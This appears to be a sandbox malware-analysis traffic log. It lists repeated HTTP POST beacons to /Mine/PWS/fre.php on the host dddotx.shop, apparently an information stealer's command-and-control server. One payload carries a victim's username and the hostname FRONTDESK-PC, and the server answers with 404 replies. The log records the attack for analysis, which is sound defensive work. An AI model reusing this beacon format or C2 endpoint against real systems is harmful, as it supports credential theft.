            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
            Source: global trafficDNS traffic detected: DNS query: dddotx.shop
            Source: unknownHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t8yz2U2irZoq6Uw3dUjkj78ZEXgG8MnmB9xALizVpWkR%2Fm9vqAsd%2FGudhHg2amd1h76Hv%2FFQ3maCR8loEfHWWrsPf2IzBdgKhiO1TM8W2S4SmEKHdvu4rhyEu%2BxBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89966aded28ce8-EWRData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2H2c0Gj2uWvet4ViqNJLX2Yk7vZoWpp7RzdBTI8kZBYwxHhoRCOudl3VT3vT0IFa8M5zwG07SPzAGiDhFJbHQVp%2BXVJFYW2UtP2E5aTuCCA2OJPUz%2BiNx1gjG%2Bzcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89967168f01a0f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2OvSeZZQTmhd75P2XTmwZYodU%2Bl68iqvjz7NIeIFz1rA76YgN73SvxxXjb1%2B15DmR1rjbTH9rRfbWNKCSPsrPjr5uUQWgjwaan7Mn11nDQzivaZQUC8W95fghiLug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996767a458cb4-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlhK6sP%2FjGiccxN5WqbMJ7FBrFLcskipZJsHQypob8lx8mwY94fXCU0%2Bzg0m9JyL9WInxHL8HL%2FIcG6YpXj5nDlfdi0TvjpZNJA7v6GW53X%2BhJzRWdkQC9AOWKDkTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89967c1fbe43d9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boOSk5iX75iAUOyBOaaWNADScZnIR3oD4BhEaYPKDT5WwvpMQuGiaECNRY4r049k18b7jnIy6akaSEC1DxCWQmvfEQKE%2B9hkM7hsww5HvAYbPxF1gQh%2F08Q3%2BgfIYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899681aa685e5f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trQiPC%2BfoJTo3Hf42NuVPNFZ2GNtT6TX6AIXzO021oL5tY3Lf1N3vmKdctmyeuZwnHk0m01wwaI%2FPbVTgXCWYj1JqC0dng4snsXkckUT43xMH2igMHAtVqi3e%2Fcl%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899686cb0f1791-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cmhbUqd%2FywIijoA3eanxHATHUbXNJ5Ze3GMIvAixoBoM3qA%2FHlrXuFWPOiq6MDSiSQwGGUas%2F8TRYTlfGNnbjpxK7KouFFFSiw1Aogsf4jiBKeYZ%2F8SSZxv%2FD9hUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89968c8eb90cc2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hjf7%2FbhQDeW6ZKrU5IhE4S3b8rSFr22eXuOErInXDBXVF1vNV3S859ZlrN6LeNF%2BShs5Eniv5%2BkKTQf7iV7T0BZNSBzuFeZY8fAgQrKEfwgSj%2BN3zXz7lwR%2FztHs9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89969389c70f5b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHAGU87e5ScF5VKOzXAOGbSh%2Fv0%2BC3b88kNJGrDL%2B%2FYP%2BCefGKZC6HQrhY%2BMBAVaCJCmPPvQOXZ18gp6aZWKFXwd1GwCby9clYUWmbSHi5hAkYZOsVRLmljJXBX1bA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899698de2b5e6d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8QNSisiSVEqhsk6TCyoGssnRvviWJUo9jzDFmiQm4VI28HHBgYV0vYYMShDkhYNJJVb6E8f6yZOg2qgKRjkF17BC5dCBiIQ36FRa2FZRqcgpVmssGNk2A9KKQ1CXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89969dd9e4431a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996a2deb043dd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996a2deb043dd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03BLncS52vpJEz1WmD%2BLPQ9t97y29aDADLRNppBZesIOedKbpGF3mpYFoickwpiFSIGSpiVgIKiYvX5FpkwIpoiyclDx5RgO0VKa2UncvkFbJ1ECLtf1AES7wT0qiw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996a9eeba4319-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iuyt4sVbpw5v7D8MRS4CpKTyIh9kMv8R8bEhoqf9Sc7SaHYxg1XWLFkdDk7HxcvGV%2BtLLZQTgr2RbCLHi3QlChNz0IQEAP91q0VwW0fht4kRnYyFfvMEhiKchpY1pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996af2d5c7292-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=przmNtHt17QidHH1WoXo5RRVUv7HWNlmaIYCtvS%2BbUHR8XjEGwfebNnwepPJjMoPToSTfe7PbIPPharL1ajJnVZ2glsmcXP%2BHN1c3YTGb83cUhdGnXFrrt9wF5tNMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996b528d58cdc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QgCVXj7RNA514KYbr%2BwUa%2BoK0SASz7gyoS3HxtTGjWWUrzgSq5IhiXSYvFZQZqA4Bhuhxo7WhImHscO4kj2WQ3jOvG0FSvEV%2BK5eh2X0rapu%2FzsBpyN7w8nm%2F%2FsMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996bb0c387d06-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AAybTIgOuUxx7QPzV%2B87h6QxSjxBTdSBgErwND8sNgMOvLLNA4ZTjKWQy1MVfWsy9SM95W6FgE9w%2FMdUuhGznlpnmHFazXQ661H1SLTOjTY5EaCl2vHPsMjajw%2FmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996c00f91c334-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maqvNCmgSwqA2O7i62KLiBuc7DqBxStg5Y%2Ffan4JJxh9IsWq%2Fm%2B6kDO3bvlCjthk60vmL31PeK%2FeZQBpO9GHbGg42%2BWoRcNv1W4Zvh6fTAjL%2Fcuo8LwKeBgvcmj6rA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996c6591a8c5f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1JoKrr7RhHAcpEe2cIYu5MWlyXZ6HS1JJtDy5m%2Fsrf%2B2aA1k0%2Bo0XoarJsZAKkRge0XXh62ZwPrbp1qINoihMUOlaNg4LF6PsYEaJe7cDIRipgD11gcv%2BHLmiG0jg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996cb6f104401-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZ2uo4MS5haEFosad9DwHaAfIJP%2B9jPM1Cj4YkThGFemLImngDuXKlgfVe4vRiD5kTvw1PAOt6JHEDvWsvKDwqAqI35yC%2FembVxVhudmg1e6euqs0XPk13ES4XugDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996d10e290ca2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Xkta2U3QnLTgQhBitM61NxDRFKQNUwbsyMpWsX7tdzdkGpuo8YbGk2KkWGJtMBUPUrB1FjXVKY7DE%2BuMG8wnQhhvwpVVW0wbT3XTOWQBO4xVOo4uOImjw6jhR%2BruQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996d67c038c60-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRkENZEDwOcPzD62L4S7Gg4KDUpucGpdy4xNGyJoqEPX%2FOdANorPqjHQv5z4JgNB0Nzz7s3Pmey1HJ8oWwLrJuk7gdwZmFVKcxnlYJCpI5CkSAU9ksvvGv2hlyozXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996e1d83b424a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvbXnmF9JsaSZMr0T%2B8mojQtqU91k2MfExJUFwLNUqGGeMJBYJemVH0qK6bjvGtA6kfOp3kfE%2B7Ykwn6uz5lRISD5aHZkf5bK9DGrOdBqDTzSyUw5nTBWn%2B2KRCsTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996e7ba494349-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:19:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ph4jvZ6wd3aVkAH%2BqVmYUVFZZxodfJmAaTv72TJBljn8HDSRVgnNsuQObOsBys7CzVCAc4cjnoVTUISIatbNYSouD%2F0MLK4NMGWcRKdvFBNSHDbg65y7auLOSKiLUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8996ecfe6b1871-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
